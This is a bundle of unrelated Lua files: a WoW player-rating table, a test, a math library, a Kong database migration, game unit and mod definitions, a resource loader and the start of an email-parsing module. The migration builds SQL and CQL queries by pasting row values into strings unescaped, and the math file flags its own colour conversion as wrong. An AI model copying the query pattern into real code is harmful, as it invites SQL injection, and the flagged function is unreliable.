["Desar"] = "RB:528/70%RM:583/66%",
["Imworthless"] = "EB:469/82%RM:338/64%",
["Carebearz"] = "UT:242/28%RB:455/64%UM:412/48%",
["Winarchan"] = "UM:127/43%",
["Youvegotmail"] = "CB:134/14%RM:423/50%",
["Viandora"] = "CB:34/5%CM:50/18%",
["Bandiet"] = "CB:49/4%CM:33/11%",
["Celinnassa"] = "RB:376/71%RM:424/71%",
["Kelbur"] = "UT:254/32%RB:374/51%UM:312/37%",
["Healinfools"] = "CT:158/18%UB:345/48%EM:710/81%",
["Twokiloblunt"] = "UB:273/35%EM:811/85%",
["Estusflask"] = "CB:94/8%CM:165/19%",
["Snarfee"] = "CB:74/8%CM:87/10%",
["Schlorfgorf"] = "CM:182/22%",
["Panzerpally"] = "CM:35/23%",
["Hlaalu"] = "ST:849/99%SB:812/99%LM:940/96%",
["Scranch"] = "ET:701/90%EB:630/82%EM:654/90%",
["Redshirtguy"] = "UB:216/27%RM:558/65%",
["Charinna"] = "CB:162/20%",
["Chenn"] = "CM:59/8%",
["Fuzylogic"] = "CB:147/19%",
["Hayo"] = "UB:311/42%UM:383/44%",
["Baap"] = "UM:390/42%",
["Ckorob"] = "CM:64/9%",
["Vinsmoker"] = "CB:32/1%CM:59/21%",
["Faceit"] = "CB:85/10%UM:292/33%",
["Dreadcloud"] = "CT:174/22%RB:443/60%RM:330/68%",
["Nuanyang"] = "CM:43/14%",
["Corpsecider"] = "UT:360/47%UB:310/40%",
["Jorach"] = "CT:39/3%CB:41/2%UM:163/43%",
["Sashinoodle"] = "UT:155/48%RM:200/52%",
["Cigä"] = "UT:334/43%RB:419/56%RM:221/51%",
["Iscalio"] = "CM:87/12%",
["Babylu"] = "CB:33/2%CM:71/10%",
["Anaiya"] = "UB:285/37%",
["Blackdiablo"] = "CM:36/4%",
["Fanalfantasy"] = "UB:213/27%CM:25/0%",
["Foreverlife"] = "ET:655/85%EB:618/81%",
["Fantasoda"] = "UB:121/33%CM:37/11%",
["Deadzone"] = "CM:10/2%",
["Azurai"] = "RM:596/68%",
["Rankstar"] = "CB:136/14%CM:67/23%",
["Rossweiss"] = "CT:35/3%CB:94/9%CM:39/3%",
["Flinstone"] = "UT:105/36%RB:379/53%EM:700/79%",
["Revenant"] = "CT:37/2%UB:227/28%UM:96/32%",
["Archilons"] = "CT:146/23%EB:378/75%",
["Totemptation"] = "UT:92/29%CB:74/18%CM:28/0%",
["Lovelost"] = "CT:188/24%CB:160/20%UM:283/33%",
["Serrina"] = "UB:198/26%CM:56/7%",
["Aliicat"] = "CM:18/5%",
["Thunderass"] = "UM:185/39%",
["Diabolicalx"] = "UM:75/28%",
["Keloggs"] = "CM:85/11%",
["Wehttam"] = "RM:473/53%",
["Tristestar"] = "CB:37/3%CM:163/20%",
["Mugiwara"] = "RM:581/63%",
["Ezkaiwlk"] = "CM:28/11%",
["Jaenudin"] = "CM:39/4%",
["Pixeldot"] = "UM:238/29%",
["Ggon"] = "EB:643/83%",
["Penaltyy"] = "ET:667/87%EB:665/85%EM:762/82%",
["Theplugsplug"] = "CB:25/0%CM:139/19%",
["Jinramen"] = "UM:298/35%",
["Chippawah"] = "RB:407/52%",
["Revenantecho"] = "UB:235/29%RM:459/53%",
["Milkyy"] = "RT:424/55%RB:383/54%",
["Maviess"] = "CB:81/10%",
["Grl"] = "CB:108/11%RM:233/57%",
["Meimeong"] = "CB:54/6%",
["Kindrid"] = "EB:549/78%RM:628/72%",
["Laracraft"] = "CB:160/18%CM:99/11%",
["Justicejoo"] = "CT:142/15%UB:315/42%RM:439/51%",
["Notfeigning"] = "UB:203/26%",
["Xm"] = "UM:77/28%",
["Blastyy"] = "LT:771/97%SB:802/99%SM:996/99%",
["Vaelstraza"] = "CB:166/19%RM:453/54%",
["Easysqueezy"] = "CT:41/18%CB:65/17%",
["Kyrisa"] = "CB:32/2%",
["Ecnu"] = "CB:172/20%",
["Ggrunrunde"] = "CB:123/15%RM:597/66%",
["Romaday"] = "RT:352/71%EB:307/75%EM:561/90%",
["Charmen"] = "UM:152/44%",
["Resetforme"] = "UM:103/31%",
["Gideonrogue"] = "UM:139/38%",
["Angelinababy"] = "UM:106/39%",
["Redkilrogue"] = "CB:169/21%RM:288/60%",
["Brokeaholic"] = "UT:378/49%UM:145/46%",
["Rasmorick"] = "RM:160/50%",
["Hade"] = "UM:68/26%",
["Haygood"] = "CM:161/19%",
["Dvoltz"] = "UM:138/36%",
["Sythicc"] = "CT:27/1%",
["Ragergabriel"] = "CT:37/12%CB:47/10%CM:33/3%",
["Engrod"] = "CM:37/15%",
["Chedah"] = "CT:61/22%CB:20/0%",
["Kagomie"] = "CT:163/21%UM:389/45%",
["Lshtar"] = "CM:27/0%",
["Somnos"] = "CM:22/3%",
["Prayerjob"] = "UT:376/46%RB:487/70%",
["Wiccan"] = "CT:152/21%RB:334/74%RM:419/50%",
["Quaad"] = "RT:414/52%EB:618/87%EM:761/86%",
["Remyhulk"] = "UT:266/37%RB:453/59%",
["Warli"] = "CT:119/15%CB:82/10%CM:42/17%",
["Letha"] = "UB:263/34%",
["Copue"] = "UB:194/25%UM:246/30%",
["Gnoledge"] = "RB:453/63%RM:467/55%",
["Eskimodius"] = "CB:95/11%",
["Jahkor"] = "UB:210/27%UM:235/28%",
["Xukini"] = "CB:148/18%UM:396/45%",
["Ammön"] = "ET:242/77%EB:626/81%CM:119/15%",
["Riiej"] = "CB:175/20%UM:140/38%",
["Pollyzug"] = "RT:472/64%EB:714/90%EM:758/82%",
["Hughhungus"] = "CM:27/0%",
["Afrasiabi"] = "CB:146/15%UM:294/34%",
["Firedogx"] = "UT:289/40%RB:559/74%EM:740/80%",
["Stihlblade"] = "UM:271/32%",
["Hexatard"] = "CM:27/0%",
["Thunduh"] = "CM:64/8%",
["Dvor"] = "UT:46/49%CB:83/7%CM:58/5%",
["Spinebuster"] = "CB:126/15%CM:178/21%",
["Ost"] = "UM:302/31%",
["Devilshadowj"] = "CT:25/2%CB:138/16%UM:348/41%",
["Cytokine"] = "RT:537/72%RB:157/50%UM:243/28%",
["Mochasela"] = "ET:559/78%EB:578/80%UM:420/49%",
["Obviously"] = "RT:401/55%UB:373/47%CM:90/12%",
["Jesikk"] = "UT:132/41%UB:258/34%UM:76/27%",
["Lucknut"] = "UB:190/25%",
["Insyur"] = "CB:84/22%",
["Meguminmin"] = "CB:112/14%",
["Jusqua"] = "CB:147/16%UM:221/26%",
["Øff"] = "UB:114/30%",
["Wrathofmath"] = "RB:556/73%EM:881/88%",
["Clöud"] = "CB:74/9%UM:372/43%",
["Byulbitt"] = "UB:347/46%UM:372/43%",
["Simptease"] = "EB:637/82%UM:419/48%",
["Monkeynèws"] = "CB:181/19%",
["Freezr"] = "CB:112/14%CM:63/24%",
["Vaq"] = "CB:198/21%",
["Olironlungs"] = "CT:92/9%UB:195/47%",
["Luxxa"] = "UT:291/35%UB:223/28%EM:706/81%",
["Preventer"] = "UT:375/49%EB:590/82%EM:658/76%",
["Griptilda"] = "RT:570/74%EB:538/77%EM:818/90%",
["Elbulli"] = "CT:37/2%CB:36/2%UM:119/38%",
["Preworkout"] = "CT:101/17%UB:190/44%UM:297/34%",
["Galbay"] = "CT:20/9%",
["Artiodactyla"] = "ET:324/81%EB:559/79%RM:551/64%",
["Mazza"] = "CM:62/8%",
["Williomcandy"] = "CM:28/1%",
["Icenether"] = "CM:113/16%",
["Døminic"] = "CT:0/3%CB:79/8%CM:49/18%",
["Hasrah"] = "CT:26/0%RB:456/63%EM:792/84%",
["Starjay"] = "CM:24/4%",
["Feederation"] = "UT:106/39%UB:223/28%",
["Healsqt"] = "CT:87/9%UB:181/44%RM:468/55%",
["Gromtharr"] = "UM:81/31%",
["Bakermeow"] = "CM:33/3%",
["Boreall"] = "CT:35/2%CB:78/19%RM:667/69%",
["Ausalt"] = "LT:586/98%",
["Charlibaby"] = "UT:223/33%CB:179/23%",
["Tyrandeyf"] = "RB:382/54%RM:437/52%",
["Belen"] = "UM:385/46%",
["Frosttflame"] = "CT:39/17%CM:60/8%",
["Ýz"] = "UM:360/42%",
["Afkhealing"] = "UB:350/49%RM:506/60%",
["Joohouse"] = "UT:216/31%RB:559/74%RM:496/56%",
["Sheepofeeder"] = "CB:185/24%",
["Pinktail"] = "CT:28/1%CB:48/5%UM:370/42%",
["Jaede"] = "RB:489/70%RM:394/74%",
["Drownning"] = "EB:578/76%",
["Taintgargler"] = "RB:259/54%UM:133/41%",
["Huntsherk"] = "RB:552/74%UM:301/34%",
["Tristin"] = "RB:459/60%",
["Frostshaka"] = "CB:144/19%",
["Elesham"] = "CB:165/19%UM:85/30%",
["Lazo"] = "RT:399/52%EB:585/77%RM:643/70%",
["Notaheeler"] = "UB:307/42%RM:448/53%",
["Zipyari"] = "RB:454/62%CM:110/13%",
["Hellheat"] = "UM:408/48%",
["Ddogges"] = "RB:390/70%RM:520/73%",
["Shamwowpokes"] = "UM:290/34%",
["Lockchsr"] = "UB:233/31%UM:221/28%",
["Gosokbus"] = "CM:83/12%",
["Tosi"] = "UB:325/44%UM:343/40%",
["Badtim"] = "UM:237/29%",
["Xthc"] = "RB:207/50%RM:629/69%",
["Raysvolk"] = "CM:26/0%",
["Aldek"] = "EM:731/89%",
["Aedgyn"] = "CM:35/5%",
["Hobac"] = "UT:214/25%UB:311/42%RM:570/67%",
["Ohpicul"] = "UT:70/27%EB:621/82%RM:665/72%",
["Qayleen"] = "CM:28/1%",
["Psherman"] = "CB:91/23%",
["Augusterth"] = "CB:66/17%UM:96/36%",
["Livetozug"] = "CT:126/16%UM:93/29%",
["Kushchieferx"] = "RT:505/66%EB:477/85%RM:545/61%",
["Silversin"] = "RB:501/67%RM:322/67%",
["Mediums"] = "RB:434/62%RM:466/55%",
["Bayoubilly"] = "CB:85/10%CM:97/12%",
["Dazbone"] = "CB:63/16%",
["Belovedscuum"] = "CT:42/6%CB:36/7%",
["Excorsist"] = "UB:126/33%UM:357/40%",
["Touteng"] = "CB:56/6%",
["Minnodin"] = "CB:38/2%",
["Bananarama"] = "RB:342/66%RM:338/64%",
["Fartcombo"] = "CT:45/5%CB:169/21%",
["Mushunator"] = "RB:504/66%",
["Drewb"] = "UB:127/35%",
["Moonopoly"] = "UB:81/48%UM:200/40%",
["Lokasa"] = "CB:54/13%CM:28/1%",
["Mowoyer"] = "UB:250/28%CM:176/22%",
["Fordcrownvic"] = "UB:203/25%",
["Peoness"] = "UB:109/27%UM:222/27%",
["Rofle"] = "RB:447/61%",
["Bloodlibels"] = "CB:95/11%UM:115/33%",
["Pmrmp"] = "UT:92/34%RB:514/69%RM:545/60%",
["Steveaoki"] = "RB:504/66%RM:251/59%",
["Budsworth"] = "RB:564/74%RM:535/61%",
["Treelicker"] = "UB:285/38%UM:386/46%",
["Tktlai"] = "CB:138/15%UM:396/47%",
["Pastries"] = "CB:150/19%RM:253/65%",
["Bavi"] = "UT:286/34%RB:467/67%",
["Sitn"] = "CB:26/0%",
["Shirleytempl"] = "UB:343/47%",
["Uoou"] = "EB:661/85%EM:711/76%",
["Nillaev"] = "CT:76/14%",
["Avesthise"] = "CM:116/14%",
["Negativet"] = "CM:36/3%",
["Poonslayr"] = "UT:240/31%UM:211/30%",
["Suliss"] = "CM:85/10%",
["Tutankhamun"] = "CM:6/1%",
["Ubé"] = "CB:157/17%CM:113/13%",
["Babamelvin"] = "UM:287/49%",
["Meatpattie"] = "CM:39/12%",
["Pennysaver"] = "CM:42/15%",
["Thirst"] = "CB:84/10%CM:163/20%",
["Verycutes"] = "CM:26/0%",
["Furlor"] = "CM:55/7%",
["Djarum"] = "CM:35/3%",
["Freana"] = "CT:26/0%UB:148/36%CM:30/1%",
["Aoaokanggan"] = "CT:30/6%UM:64/34%",
["Finale"] = "CB:83/20%CM:28/1%",
["Hotrodcool"] = "UB:333/45%CM:188/21%",
["Jeltyr"] = "CB:51/3%",
["Yuppi"] = "EB:627/82%EM:920/93%",
["Lgtwins"] = "UM:368/42%",
["Lzza"] = "UM:172/45%",
["Zinq"] = "CM:197/22%",
["Premed"] = "CM:108/14%",
["Valdmire"] = "CM:65/8%",
["Motto"] = "RM:179/53%",
["Empressing"] = "UM:335/39%",
["Yakee"] = "UB:250/32%UM:245/29%",
["Météore"] = "CM:34/2%",
["Massheals"] = "RM:233/53%",
["Efran"] = "CB:170/18%",
["Flyjuice"] = "CB:114/11%UM:90/26%",
["Splack"] = "CM:36/4%",
["Fillter"] = "UM:85/30%",
["Budi"] = "CB:27/3%",
["Fenneko"] = "RT:394/51%UM:238/29%",
["Sicko"] = "CT:68/8%",
["Netman"] = "UM:92/37%",
["Spititboy"] = "UT:15/40%CB:59/5%",
["Chromumi"] = "CT:27/6%CB:42/8%",
["Feartoall"] = "CT:4/5%RB:238/55%RM:415/65%",
["Redmans"] = "RT:413/54%RB:279/62%CM:35/4%",
["Cinderfellah"] = "UM:303/36%",
["Lavatanatess"] = "CB:73/9%CM:105/15%",
["Littlefarmer"] = "CB:65/7%CM:153/19%",
["Judgedred"] = "UM:185/48%",
["Arrow"] = "CM:89/11%",
["Beibeii"] = "CT:57/6%UB:166/42%",
["Unheardriver"] = "RT:373/51%EB:437/82%UM:245/29%",
["Crushing"] = "RB:241/67%RM:517/69%",
["Alwayzlol"] = "CB:32/17%UM:50/28%",
["Killuarogue"] = "RB:388/51%",
["Coldhands"] = "CB:155/19%CM:71/11%",
["Trizzlë"] = "RB:435/62%UM:332/40%",
["Gnomeisbad"] = "CM:26/0%",
["Harrokitty"] = "RM:596/70%",
["Dekk"] = "UM:157/41%",
["Kurtcobank"] = "CM:137/19%",
["Chodegurgler"] = "RT:224/64%EM:622/79%",
["Holypasta"] = "CM:1/1%",
["Kaoos"] = "CM:69/22%",
["Camparie"] = "RB:522/69%EM:693/76%",
["Oomoomoomoo"] = "CT:38/4%CB:33/4%",
["Ricradmask"] = "CT:32/12%CB:163/17%",
["Gurr"] = "CT:31/2%",
["Cybershammy"] = "CM:107/12%",
["Landsham"] = "RT:246/69%RB:493/71%CM:51/4%",
["Toastybear"] = "UT:114/41%CB:141/15%RM:239/61%",
["Goldnimo"] = "CT:8/9%",
["Grumorin"] = "ET:603/80%EB:385/76%UM:265/31%",
["Friggz"] = "UT:387/47%EB:448/86%",
["Éboy"] = "CT:41/3%CB:170/19%",
["Chonda"] = "RM:218/52%",
["Nonamekem"] = "RB:481/63%EM:710/78%",
["Rasmanit"] = "LT:790/98%EB:710/90%",
["Healbõt"] = "RT:164/51%RB:257/60%RM:295/63%",
["Konyhawkslyr"] = "UM:87/27%",
["Gigachadd"] = "RB:390/68%",
["Lilpook"] = "CB:45/3%UM:331/39%",
["Myrdoc"] = "LB:768/98%EM:694/81%",
["Dexmage"] = "UB:348/47%UM:199/26%",
["Sunnytales"] = "UT:278/33%UB:241/31%UM:337/40%",
["Zolcenax"] = "CB:33/2%",
["Neburx"] = "EB:646/83%RM:673/74%",
["Maxout"] = "CB:69/16%",
["Bearlyheal"] = "RT:219/67%EB:536/76%RM:458/55%",
["Deeznútz"] = "RB:414/72%",
["Hanssell"] = "CB:208/22%CM:126/16%",
["Moliz"] = "RB:321/65%",
["Charlemurphy"] = "UB:286/33%",
["Spammoo"] = "UB:211/26%",
["Kruntch"] = "RB:523/69%UM:149/42%",
["Icyticklez"] = "EB:596/82%",
["Davidsbody"] = "CB:44/2%",
["Chumbawamba"] = "RB:157/64%",
["Zakoto"] = "CT:48/20%RB:414/53%UM:415/47%",
["Pakboy"] = "CB:48/11%",
["Crestor"] = "UB:122/30%RM:264/57%",
["Violetsquall"] = "CT:71/9%RB:277/61%UM:169/47%",
["Sasiau"] = "CB:151/17%",
["Mommys"] = "CM:31/2%",
["Putero"] = "UM:105/35%",
["Cuobscenems"] = "CB:38/5%UM:191/48%",
["Murðer"] = "CB:64/6%CM:62/8%",
["Oinfox"] = "UB:114/32%CM:75/11%",
["Randyragu"] = "RB:379/51%",
["Imperial"] = "CB:76/18%CM:203/24%",
}
end
|
describe('runner', function()
it('runs on empty configuration', function()
assert.Not.Nil(require('wowless.runner').run({}))
end)
end)
|
local math = math;
--local constant = _G.__LUAEX__.constant;
constant("MATH_ARL", "all real numbers");
constant("MATH_INF", "infinite");
constant("MATH_NAN", "not a number");
constant("MATH_UNDEF", "undefined");
--the Eucclidian algorithm for finding the gcf
--[[local function eucclidiangcf(nDividend, nDivisor)
local nRet = 0;
local nRemainder = nDividend % nDivisor;
local nQuotient = (nDividend - nRemainder) / nDivisor;
if (nRemainder == 0) then
nRet = nDivisor;
else
nRet = eucclidiangcf(nDivisor, nRemainder);
end
return nRet;
end]]
local function eucclidiangcf(nDividend, nDivisor)
local nRemainder = nDividend % nDivisor;
local nQuotient = (nDividend - nRemainder) / nDivisor;
return nRemainder == 0 and nDivisor or eucclidiangcf(nDivisor, nRemainder);
end
function math.clamp(nValue, nMinValue, nMaxValue)
local nRet = nValue;
if (nRet < nMinValue) then
nRet = nMinValue;
elseif (nRet > nMaxValue) then
nRet = nMaxValue;
end
return nRet;
end
--[[Usage: To get the Width/Height Input Factors of the original rectangle use math.ratio(w, h)/math.ratio(h, w) respectively]]
--TODO put a safety switch in here
--gets the largest rectangle of the specified ratio that will fit within the given rectangle (then, optionally, scales it and centers it if requested)
function math.fitrect(nRectWidth, nRectHeight, nRectX, nRectY, nWidthFactor, nHeightFactor, nScale, bCenter)
--the final, resultant values
local nWidth = 0;
local nHeight = 0;
--the position of the new rectangle inside the parent
local nX = 0;
local nY = 0;
--this tells when the tested size falls outside of the parent's boundary
local bIsSmaller = true;
--increments each iteration to increase the test rectangle size
local nCounter = 0;
--the values to be tested each iteration
local nTestWidth = nWidth;
local nTestHeight = nHeight;
--check and clamp the scale value
nScale = (type(nScale) == "number") and nScale or 1;
nScale = (nScale >= 0) and nScale or -nScale;
--check the center value
bCenter = type(bCenter) == "boolean" and bCenter or false;
while (bIsSmaller) do
--increment the counter
nCounter = nCounter + 1;
--create the new test rectangle size
nTestWidth = nWidthFactor * nCounter;
nTestHeight = nHeightFactor * nCounter;
--check to see if it fits inside the parent...
if (nTestWidth <= nRectWidth and nTestHeight <= nRectHeight) then
--...and, store it as a valid size if it does fit
nWidth = nTestWidth;
nHeight = nTestHeight;
else
--...or, end the loop (using the last, viable size) if it does not fit
bIsSmaller = false;
--scale the rectangle
nWidth = nWidth * nScale;
nHeight = nHeight * nScale;
--calculate the centered position of the rectangle inside the parent
if (bCenter) then
nX = nRectX + (nRectWidth - nWidth) / 2;
nY = nRectY + (nRectHeight - nHeight) / 2;
end
end
end
return {width = nWidth, height = nHeight, x = nX, y = nY};
end
function math.gcf(nNum, nDen)
local nRet = 1;
local nSmall = 0;
local nLarge = 0;
if (nNum ~= 0 and nDen ~= 0) then
nSmall = math.abs(nNum);
nLarge = math.abs(nDen);
--get the largest of the numbers
if (nSmall > nLarge) then
local nTemp = nSmall;
nSmall = nLarge;
nLarge = nTemp;
nTemp = nil;
end
--perfom the Eucclidian algorithm
nRet = eucclidiangcf(nLarge, nSmall);
end
return nRet;
end
function math.iseven(nValue)
return (nValue % 2 == 0);
end
function math.isinteger(nValue)
return (nValue == math.floor(nValue));
end
function math.isodd(nValue)--TODO check if this is an integer first
return (nValue % 2 ~= 0);
end
function math.ratio(nLeft, nRight)
local nGCD = math.gcf(nLeft, nRight);
return {left = nLeft / nGCD, right = nRight / nGCD};
end
function math.rgbtolong(nR, nG, nB)
return nR + nG * 256 + nB * 65536;
end
--TODO fix this! the math is wrong...find a good example
function math.longtorgb(nValue)
local nBlue = math.floor(nValue / 65536);
local nGreen = math.floor((nValue % 65536) / 256);
local nRed = nValue % 256;
return {
r = nRed,
g = nGreen,
b = nBlue,
};
end
return math;
|
return {
postgres = {
up = [[
DO $$
BEGIN
ALTER TABLE IF EXISTS ONLY "foos" ADD "shape" TEXT UNIQUE;
EXCEPTION WHEN DUPLICATE_COLUMN THEN
-- Do nothing, accept existing state
END;
$$;
]],
teardown = function(connector, _)
assert(connector:connect_migrations())
for rows, err in connector:iterate('SELECT * FROM "foos";') do
if err then
return nil, err
end
for _, row in ipairs(rows) do
local shape = "triangle"
local sql = string.format([[
UPDATE "foos" SET "shape" = '%s' WHERE "color" = '%s';
]], shape, row.color)
assert(connector:query(sql))
end
end
end,
},
cassandra = {
up = [[
ALTER TABLE foos ADD shape text;
CREATE INDEX IF NOT EXISTS foos_shape_idx ON foos(shape);
]],
teardown = function(connector, _)
local coordinator = assert(connector:connect_migrations())
for rows, err in coordinator:iterate("SELECT * FROM foos") do
if err then
return nil, err
end
for _, row in ipairs(rows) do
local shape = "triangle"
local cql = string.format([[
UPDATE foos SET shape = '%s' WHERE color = '%s'
]], shape, row.color)
assert(connector:query(cql))
end
end
end,
},
}
|
local inventory = {
items = { 1, 2 }
}
function inventory:addItem(id)
table.insert(self.items, id)
end
function inventory:addItemsList(list)
table.move(list, 1, #list, #self.items + 1, self.items)
end
function inventory:removeItem(id)
table.removeByValue(self.items, id)
end
function inventory:getEquippableIds()
local result = {}
for index, id in ipairs(self.items) do
if items[id].type == "sword" then
table.insert(result, id)
end
end
return result
end
function inventory:getUsableItemsIds()
local result = {}
for index, id in ipairs(self.items) do
if items[id].use then
table.insert(result, id)
end
end
return result
end
return inventory |
return {
coreter = {
acceleration = 0.0407,
activatewhenbuilt = true,
brakerate = 0.06,
buildcostenergy = 1867,
buildcostmetal = 107,
builder = false,
buildpic = "coreter.dds",
buildtime = 6400,
canattack = false,
canguard = true,
canmove = true,
canpatrol = true,
canstop = 1,
category = "ALL MOBILE SMALL SURFACE UNDERWATER",
collisionvolumeoffsets = "0 -3 0",
collisionvolumescales = "26.5 26.5 47.5",
collisionvolumetype = "CylZ",
corpse = "dead",
defaultmissiontype = "Standby",
description = "Radar Jammer Vehicle",
energymake = 0,
energyuse = 100,
explodeas = "SMALL_UNITEX",
footprintx = 3,
footprintz = 3,
idleautoheal = 5,
idletime = 1800,
leavetracks = true,
losemitheight = 22,
maneuverleashlength = 640,
mass = 107,
maxdamage = 520,
maxslope = 16,
maxvelocity = 1.452,
maxwaterdepth = 0,
mobilestandorders = 1,
movementclass = "TANK3",
name = "Deleter",
noautofire = false,
objectname = "CORETER",
onoffable = true,
radardistancejam = 450,
radaremitheight = 25,
seismicsignature = 0,
selfdestructas = "SMALL_UNIT",
sightdistance = 299,
standingmoveorder = 1,
steeringmode = 1,
trackoffset = 3,
trackstrength = 6,
trackstretch = 1,
tracktype = "StdTank",
trackwidth = 27,
turninplace = 0,
turninplaceanglelimit = 140,
turninplacespeedlimit = 0.95832,
turnrate = 619.29999,
unitname = "coreter",
customparams = {
buildpic = "coreter.dds",
faction = "CORE",
},
featuredefs = {
dead = {
blocking = true,
collisionvolumeoffsets = "1.41645812988 -2.61718749996e-05 1.27348327637",
collisionvolumescales = "29.8956298828 22.6313476563 49.5100708008",
collisionvolumetype = "Box",
damage = 732,
description = "Deleter Wreckage",
energy = 0,
featuredead = "heap",
footprintx = 3,
footprintz = 3,
metal = 80,
object = "CORETER_DEAD",
reclaimable = true,
customparams = {
fromunit = 1,
},
},
heap = {
blocking = false,
damage = 915,
description = "Deleter Debris",
energy = 0,
footprintx = 3,
footprintz = 3,
metal = 42,
object = "3X3F",
reclaimable = true,
customparams = {
fromunit = 1,
},
},
},
sfxtypes = {
pieceexplosiongenerators = {
[1] = "piecetrail0",
[2] = "piecetrail1",
[3] = "piecetrail2",
[4] = "piecetrail3",
[5] = "piecetrail4",
[6] = "piecetrail6",
},
},
sounds = {
canceldestruct = "cancel2",
underattack = "warning1",
cant = {
[1] = "cantdo4",
},
count = {
[1] = "count6",
[2] = "count5",
[3] = "count4",
[4] = "count3",
[5] = "count2",
[6] = "count1",
},
ok = {
[1] = "vcormove",
},
select = {
[1] = "radjam2",
},
},
},
}
|
local cargo = dtrequire("lib.cargo")
local json = dtrequire("lib.json")
local lume = dtrequire("lib.lume")
local resource = {}
local base = {}
cargo.loaders.shader = love.graphics.newShader
function cargo.loaders.json(path)
local s = love.filesystem.read(path)
if s then
return json.decode(s)
end
end
function cargo.loaders.bank(path)
fmod.loadBank(path, 0)
end
function resource.addNamespace(namespace, path)
base[namespace] = cargo.init(path)
end
function resource.get(name)
local node = base
for _, key in ipairs(lume.split(name, ".")) do
if node then
node = node[key]
else
return nil
end
end
return node
end
function resource.getTable()
return base
end
resource.addNamespace("droptune", DROPTUNE_BASE .. "assets")
return resource |
data:extend({
{
type = "int-setting",
name = "initial-scan-radius",
setting_type = "runtime-global",
default_value = 70,
minimum_value = 10,
maximum_value = 300
},
{
type = "int-setting",
name = "initial-scan-period",
setting_type = "runtime-global",
default_value = 10,
minimum_value = 1,
maximum_value = 300,
}
})
|
local parserName = "MAIL_lua"
local parserVersion = "2020.03.31.1"
local mailParser = nw.createParser(parserName, "Internet Message Format")
nw.logDebug(parserName .. " " .. parserVersion)
local summary = {["parserName"] = parserName, ["parserVersion"] = parserVersion}
summary.parserDetails = [=[
Extracts values from email messages such as email addresses,
subject, and client.
Parsing of an Internet Message Format message (RFC 5322) is
independent of the transport of the message (SMTP, POP, IMAP,
LMTP, etc.). Think of the relationship as that between HTML
and HTTP - this parses the equivalent of HTML, not HTTP.
Meta "content" of an attachment is the literal value of the
Content-Type: header, which is easily forged. Do not consider
content meta as any more authoritative than you would a filename
extension.
]=]
--[[
VERSION
2020.03.31.1 william motley 11.5.0.0-11048.5 bugfix defect in header collection when first line doesn't have header type and value
2020.03.23.1 william motley 11.5.0.0-10941.5 collect all headers - even those we don't otherwise know about
register fullname.src and fullname.dst if registerSrcDst enabled
2019.10.25.1 william motley 11.4.0.0-10470.5 detect forged sender
2019.06.04.1 william motley 11.4.0.0-10087.1 bugfix: support custom headers even if unknown
customHeaders key name containing underscore is valid, hyphen is not
2019.03.12.1 william motley 11.4.0.0-9744.3 tweak limitations on header block size
2019.03.12.1 william motley 11.4.0.0-9744.3 go back to pcall createMeta if there's a charset, but now if fail then register w/o charset
2019.02.25.1 william motley 11.4.0.0-9744.3 check for self.sessionVars before setting orgSrc
2019.01.14.1 william motley 11.3.0.0.9710.1 accomodate 11.3+ callback order
2018.11.13.1 william motley 11.3.0.0-9462.3 use transactions if 11.3+
2018.08.30.1 william motley 11.3.0.0-9462.3 add hook for phishing module
add customHeaders option
2018.08.13.1 william motley 11.3.0.0-9488.1 bugfix some content headers ignored
2018.05.29.1 william motley 11.2.0.0-9060.3 analysis.service: base64 email attachment
2018.02.27.1 william motley 11.1.0.0-8987.3 UDM
2018.02.02.1 william motley 11.1.0.0-8873.3 accomodate multiple RFC2407 charsets if identical
2017.01.15.1 william motley 11.1.0.0-8873.3 accomodate non-RFC-compliant mime boundary terminations
improve extraction of fullname
2017.09.15.1 william motley 11.0.0.0-8709.3 support extraction of address comment as "fullname"
bugfix content-disposition meta not registered
tweak header block size limit algorithm
2017.04.27.1 william motley 10.6.3.1-7119.3 change mechanism for header block size limit
add extraction of addresses from resent-type headers
2017.03.06.1 william motley 10.6.3.0-7095.3 bugfix content header block size not limited correctly in some limited circumstances
check for the presence of a '@' in email address for all charsets
2017.02.07.2 william motley 10.6.3.0-7095.3 tweak header block size limits - allow up to 32KB for SMTP, IMAP, et al
bugfix multiple spaces in content-type header
added date and message-id mail header functions for identification only (no extraction)
2016.10.12.1 william motley 11.0.0.0-7840.3 allow larger header blocks in some circumstances
accomodate unquoted boundary definitions
2016.09.02.1 william motley 11.0.0.0-7769.3 pcall nw.createMeta if there's a charset
2016.09.02.1 william motley 11.0.0.0-7769.3 option xmailer duplicates client, not replaces
replace ir.general and ir.alert (analysis.service, ioc)
2016.08.17.1 william motley 10.6.1.0-7012 add IR meta
limit length of header block
limit length of header line
don't count token matches
add option to register mailer to different key
bugfix parseQuoted when true
2016.05.16.1 william motley 10.6.0.1.7086.2 complete rewrite - substantial performance and meta improvement
renamed "ignoremimeboundaries" to "parsequoted"
2016.01.07.1 william motley 10.6.0.0.6817 accomodate missing client self id in received header
2015.09.11.1 william motley 10.6.0.0.5648 reformat comments
2015.06.24.1 william motley 10.5.0.0.4961 support RFC2047-encoded attachment filenames
correct decoding of RFC2047 underscores
2014.12.19.1 william motley 10.4.1.0.3425 bugfix received headers
2014.08.01.1 william motley 10.4.0.0.3187 Rework how options are set
2014.03.24.1 william motley 10.3.2.2256 support RFC2047-encoded email addresses
2014.02.12.2 william motley 10.3.2.2256 rework stripping brackets and chevrons from addresses
add "Register Address Hosts" options
2013.12.19.1 william motley 10.3.2.2256 scrub unprintable characters from subject meta
2013.12.16.1 william motley 10.3.2.2256 support RFC2047-encoded subject header
2013.11.08.1 william motley 10.3.0.1920 support RFC2231-formatted attachment headers
2013.10.28.1 william motley 10.3.0.1920 remove requirement of date and originator
raise required number of headers 4 -> 5
2013.10.21.2 william motley 10.3.0.1920 strip "mailto:" from email addresses
add auth results and cloudmark headers
2013.10.18.1 william motley 10.3.0.1920 add precedence, domainkey, and list headers
2013.08.27.1 william motley 10.3.0.1506 rework how headers are counted
2013.06.17.1 william motley 10.2.5.1ish assigned alert.id's
2013.06.11.1 william motley 10.2.5.1ish don't refer to "first" and "last" for an endOfStream callback
2013.05.02.2 william motley 10.2.5.2 payload:short -> payload:uint16
payload:int -> payload:uint32
payload:byte -> payload:uint8
2013.04.12.1 william motley 10.2.0.212 multipart mime detection
email-ip detection
parse RECEIVED headers
2012.11.28.2 william motley 9.8.1.50 Initial development
OPTIONS
"Register email.src and email.dst": default FALSE
Whether to register email address meta using the index keys
"email.src" and "email.dst".
If set to FALSE, all email address meta is registered with
the index key "email".
If set to TRUE:
- Originating email addresses will be registered with the index
key "email.src"
- Recipient email addresses will be registered with the index
key "email.dst"
"Parse Quoted Messages" : default FALSE
Whether to register meta from mail headers which are part of a
quoted message.
